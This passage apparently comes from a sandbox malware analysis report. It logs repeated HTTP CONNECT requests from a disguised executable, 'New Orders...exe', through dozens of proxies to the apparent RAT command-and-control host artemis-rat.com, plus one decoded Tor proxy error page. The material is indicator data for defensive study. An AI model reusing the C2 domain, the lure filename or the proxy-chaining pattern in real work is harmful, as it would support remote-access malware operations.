                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1916192.168.2.953665192.111.135.17183027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.098243952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1917192.168.2.953387190.104.26.227336387672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.117295027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1918192.168.2.95331741.65.236.3919767672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.143697023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.241864920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.336093903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.355496883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.445003986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:28.445038080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:40.445023060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:04.632577896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:52.773181915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1919192.168.2.9551131.15.62.1256787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.152412891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1920192.168.2.953479120.194.4.15754437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.196474075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.242065907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.919294119 CET319INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:55 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 170
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1921192.168.2.95355440.76.160.14390007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.201766014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1922192.168.2.95359445.81.232.17594217672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.205650091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.242069960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1923192.168.2.953618159.223.71.71511877672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.210387945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.242110968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.336203098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.355495930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.444993019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:28.447830915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:40.445470095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:04.632586002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1924192.168.2.953573188.166.119.19231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.211971998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.273319960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.440572977 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1925192.168.2.953567123.231.230.58393657672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.212872028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.273212910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.404525995 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1926192.168.2.951347142.54.229.24941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.227382898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1927192.168.2.951137184.178.172.25152917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.230921030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1928192.168.2.953740140.227.61.156234567672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.231081963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.578969955 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1929192.168.2.953804161.97.163.52296317672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.231671095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.242110968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1930192.168.2.95372291.142.222.84122667672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.233607054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.273319960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.273863077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.273652077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.276236057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:28.273130894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:40.273365021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:04.273309946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1931192.168.2.953825103.220.205.16246737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.247673035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1932192.168.2.955096209.126.104.38124577672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.250443935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.273308039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.273858070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.273653984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.276207924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:28.273135900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:40.273416042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:04.273355007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1933192.168.2.95512098.188.47.15041457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.254718065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1934192.168.2.95511972.206.181.97649437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.255842924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1935192.168.2.955135129.213.150.20580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.259987116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1936192.168.2.955123177.38.5.1641537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.370965958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1937192.168.2.95512279.110.202.13180817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.370965958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
